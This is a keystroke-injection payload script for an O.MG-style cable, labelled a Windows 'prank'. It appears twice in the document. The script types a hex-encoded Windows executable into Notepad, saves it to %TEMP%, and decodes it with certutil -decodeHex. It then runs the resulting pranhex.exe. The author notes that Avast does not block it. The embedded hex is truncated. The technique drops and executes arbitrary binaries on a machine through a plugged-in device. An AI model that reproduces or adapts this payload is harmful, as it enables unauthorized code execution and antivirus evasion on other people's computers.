omg-payloads/payloads/library/prank/Pranh(ex)/payload.txt

REM ##################################
REM #                                |
REM # Title        : Pranh(ex)       |
REM # Author       : Aleff           |
REM # Version      : 1.0             |
REM # Category     : Prank           |
REM # Target       : Windows 10/11   |
REM #                                |
REM ##################################


Plug-And-Play <3


REM Requirements:
REM     - Nothing (i know, it's absurd)

REM Note:
REM     - For the creation of the executable, the hexadecimal code and in general to create this program I stuck to the payload: `Install And Run Any Arbitrary Executable - No Internet And Root Needed`
REM     - Tested on Windows 11
REM     - Running checked but not blocked by Avast antivirus
REM     - Original Python code in assets/pranh(ex).py
REM     - Hex content in assets/hexfile.txt
REM     - exe file in assets/pranh(ex).exe


GUI r
DELAY 1000
STRING notepad.exe
ENTER
DELAY 2000
STRING 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000cba9be848fc8d0d78fc8d0d78fc8d0d7c4b0d3d688c8d0d7c4b0d5d631c8d0d7c4b0d4d685c8d0d7c0b42dd78cc8d0d7c0b4d5d6a7c8d0d7c0b4d4d69ec8d0d7c0b4d3d686c8d0d7c4b0d1d68ac8d0d78fc8d1d7fac8d0d748b4d4d69bc8d0d748b4d2d68ec8d0d7526963688fc8d0d70000000000000000000000000000000000000000000000005045000064860700997988640000000000000000f00022000b020e22008a02000054020000000000a0a600000010000000000040010000000010000000020000050002000000000005000200000000000030060000040000afe97800030060c180841e00000000000010000000000000000010000000000000100000000000000000000010000000000000000000000094bb03003c000000002005000cf0000000e00400e82000000000000000000000002006005c070000509303001c0000000000000000000000000000000000000000000000000000001092030040010000000000000000000000a00200500300000000000000000000000000000000000000000000000000002e746578740000009088020000100000008a020000040000000000000000000000000000200000602e726461746100001a27010000a0020000280100008e0200000000000000000000000000400000402e64617461000000f803010000d00300000e000000b60300000000000000000000000000400000c02e70646174610000e820000000e004000022000000c40300000000000000000000000000400000405f524441544100005c010000001005000002000000e60300000000000000000000000000400000402e727372630000000cf000000020050000f2000000e80300000000000000000000000000400000402e72656c6f6300005c070000002006000008000000da04000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000048895c2408574883ec208bf9e8cfd30000488b18e8bfd30000488bd38b08e89d570000488bd08bcf488b5c24304883c4205fe929170000cccccccccccccccccc488d0591c30400c3cccccccccccccccc488954241048894c240853555657415641574881ec8800000033c04d8bf0488bda4889442450488bf94889442458488d15ef9402004889442460448d405889442428488d4c24204889442420498bf18be8e8ea880000448bf885c07426488d5312448bc0488d0dc5940200e8900b00008d45ff4881c488000000415f415e5f5e5d5bc3b9002000004c89ac2480000000e8673001004c8be84885c0751c4c8d4312488d15d8940200488d0d15950200e80c0b0000e963010000b900200000e839300100488be84885c0751c4c8d4312488d15fa940200488d0de7940200e8de0a0000e9350100004c89a424d0000000448b63080f1f4000660f1f8400000000004c8b0fb8002000004c3be0498bdcba01000000498bcd480f47d84c8bc3e8ead70000483bc30f85e3000000488b0fe84dd5000085c00f85d30000004c2be3895c24284c896c2420660f1f840000000000bb0020000048896c243033d2895c2438488d4c2420e8266c00008bf841bfffffffff8d480483f902767783f802746d8b4c2438482bd94d85f674284d8bce418d57024c8bc3488bcde8afde0000483bc3750c498bcee8d6d4000085c0741b418bffeb3e4885f674114c8bc3488bd5488bcee8aa9c00004803f3837c243800748083ff0174124d85e47417488bbc24c0000000e919ffffff4533ffeb28bffdffffff488b9424c8000000488d0d209402004883c212448bc7e8f4090000eb0641bfffffffff4c8ba424d0000000488d4c2420e8fa830000498bcde8ba2e0100488bcde8b22e01004c8bac2480000000418bc74881c488000000415f415e5f5e5d5bc3cccccccccccccccccccccccccccccc405641564883ec28488b01488bf24c8bf14885c075324883c178488d159f920200e80a1b00004989064885c0751a488d5612488d0d8f940200e86209000033c04883c428415e5ec38b56044533c049035608488bc8e88ad9000085c079214c8d4612488d1597940200488d0dcc940200e8eb08000033c04883c428415e5ec38b4e0c4c897c2420e8102e01004c8bf84885c07520448b4e0c4c8d4612488d15ad940200488d0dba920200e8b1080000e9b0000000807e100148895c244048896c244848897c24504c8964245875174d8bcf4533c0488bd6498bcee8c1fcffff85c0746deb608b5e0c498bef4885db746041bc0020000066660f1f8400000000004d8b0e493bdc488bfb41b801000000490f47fc488bcd488bd7e88ed500004883f801720a4803ef482bdf75d4eb224c8d4612488d150f930200488d0d3c930200e81b080000498bcfe83b2d01
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\pranhex.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\pranhex.hex" "%TEMP%\pranhex.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\pranhex.exe"
ENTER
Pranh(ex) 2023-06-14 09:41:39 +00:00			`REM ##################################`
			`REM # \|`
			`REM # Title : Pranh(ex) \|`
			`REM # Author : Aleff \|`
			`REM # Version : 1.0 \|`
			`REM # Category : Prank \|`
			`REM # Target : Windows 10/11 \|`
			`REM # \|`
			`REM ##################################`


			`Plug-And-Play <3`


			`REM Requirements:`
			`REM - Nothing (i know, it's absurd)`

			`REM Note:`
			REM - For the creation of the executable, the hexadecimal code and in general to create this program I stuck to the payload: `Install And Run Any Arbitrary Executable - No Internet And Root Needed`
			`REM - Tested on Windows 11`
			`REM - Running checked but not blocked by Avast antivirus`
			`REM - Original Python code in assets/pranh(ex).py`
			`REM - Hex content in assets/hexfile.txt`
			`REM - exe file in assets/pranh(ex).exe`


			`GUI r`
			`DELAY 1000`
			`STRING notepad.exe`
			`ENTER`
			`DELAY 2000`
			STRING 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000080100000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000cba9be848fc8d0d78fc8d0d78fc8d0d7c4b0d3d688c8d0d7c4b0d5d631c8d0d7c4b0d4d685c8d0d7c0b42dd78cc8d0d7c0b4d5d6a7c8d0d7c0b4d4d69ec8d0d7c0b4d3d686c8d0d7c4b0d1d68ac8d0d78fc8d1d7fac8d0d748b4d4d69bc8d0d748b4d2d68ec8d0d7526963688fc8d0d70000000000000000000000000000000000000000000000005045000064860700997988640000000000000000f00022000b020e22008a02000054020000000000a0a600000010000000000040010000000010000000020000050002000000000005000200000000000030060000040000afe97800030060c180841e00000000000010000000000000000010000000000000100000000000000000000010000000000000000000000094bb03003c000000002005000cf0000000e00400e82000000000000000000000002006005c070000509303001c0000000000000000000000000000000000000000000000000000001092030040010000000000000000000000a00200500300000000000000000000000000000000000000000000000000002e746578740000009088020000100000008a020000040000000000000000000000000000200000602e726461746100001a27010000a0020000280100008e0200000000000000000000000000400000402e64617461000000f803010000d00300000e000000b60300000000000000000000000000400000c02e70646174610000e820000000e004000022000000c40300000000000000000000000000400000405f524441544100005c010000001005000002000000e60300000000000000000000000000400000402e727372630000000cf000000020050000f2000000e80300000000000000000000000000400000402e72656c6f6300005c070000002006000008000000da04000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000048895c2408574883ec208bf9e8cfd30000488b18e8bfd30000488bd38b08e89d570000488bd08bcf488b5c24304883c4205fe929170000cccccccccccccccccc488d0591c30400c3cccccccccccccccc488954241048894c240853555657415641574881ec8800000033c04d8bf0488bda4889442450488bf94889442458488d15ef9402004889442460448d405889442428488d4c24204889442420498bf18be8e8ea880000448bf885c07426488d5312448bc0488d0dc5940200e8900b00008d45ff4881c488000000415f415e5f5e5d5bc3b9002000004c89ac2480000000e8673001004c8be84885c0751c4c8d4312488d15d8940200488d0d15950200e80c0b0000e963010000b900200000e839300100488be84885c0751c4c8d4312488d15fa940200488d0de7940200e8de0a0000e9350100004c89a424d0000000448b63080f1f4000660f1f8400000000004c8b0fb8002000004c3be0498bdcba01000000498bcd480f47d84c8bc3e8ead70000483bc30f85e3000000488b0fe84dd5000085c00f85d30000004c2be3895c24284c896c2420660f1f840000000000bb0020000048896c243033d2895c2438488d4c2420e8266c00008bf841bfffffffff8d480483f902767783f802746d8b4c2438482bd94d85f674284d8bce418d57024c8bc3488bcde8afde0000483bc3750c498bcee8d6d4000085c0741b418bffeb3e4885f674114c8bc3488bd5488bcee8aa9c00004803f3837c243800748083ff0174124d85e47417488bbc24c0000000e919ffffff4533ffeb28bffdffffff488b9424c8000000488d0d209402004883c212448bc7e8f4090000eb0641bfffffffff4c8ba424d0000000488d4c2420e8fa830000498bcde8ba2e0100488bcde8b22e01004c8bac2480000000418bc74881c488000000415f415e5f5e5d5bc3cccccccccccccccccccccccccccccc405641564883ec28488b01488bf24c8bf14885c075324883c178488d159f920200e80a1b00004989064885c0751a488d5612488d0d8f940200e86209000033c04883c428415e5ec38b56044533c049035608488bc8e88ad9000085c079214c8d4612488d1597940200488d0dcc940200e8eb08000033c04883c428415e5ec38b4e0c4c897c2420e8102e01004c8bf84885c07520448b4e0c4c8d4612488d15ad940200488d0dba920200e8b1080000e9b0000000807e100148895c244048896c244848897c24504c8964245875174d8bcf4533c0488bd6498bcee8c1fcffff85c0746deb608b5e0c498bef4885db746041bc0020000066660f1f8400000000004d8b0e493bdc488bfb41b801000000490f47fc488bcd488bd7e88ed500004883f801720a4803ef482bdf75d4eb224c8d4612488d150f930200488d0d3c930200e81b080000498bcfe83b2d01
			`DELAY 2000`
			`ALT F`
			`DELAY 1000`
			`STRING S`
			`DELAY 1000`
			`STRINGLN "%TEMP%\pranhex.hex"`
			`DELAY 1000`
			`ENTER`
			`DELAY 1000`
			`ALT F4`
			`DELAY 2000`
			`GUI r`
			`DELAY 500`
			`STRINGLN certutil -f -decodeHex "%TEMP%\pranhex.hex" "%TEMP%\pranhex.exe"`
			`DELAY 1000`
			`ENTER`
			`DELAY 1000`
			`GUI r`
			`DELAY 250`
			`STRINGLN "%TEMP%\pranhex.exe"`
			`ENTER`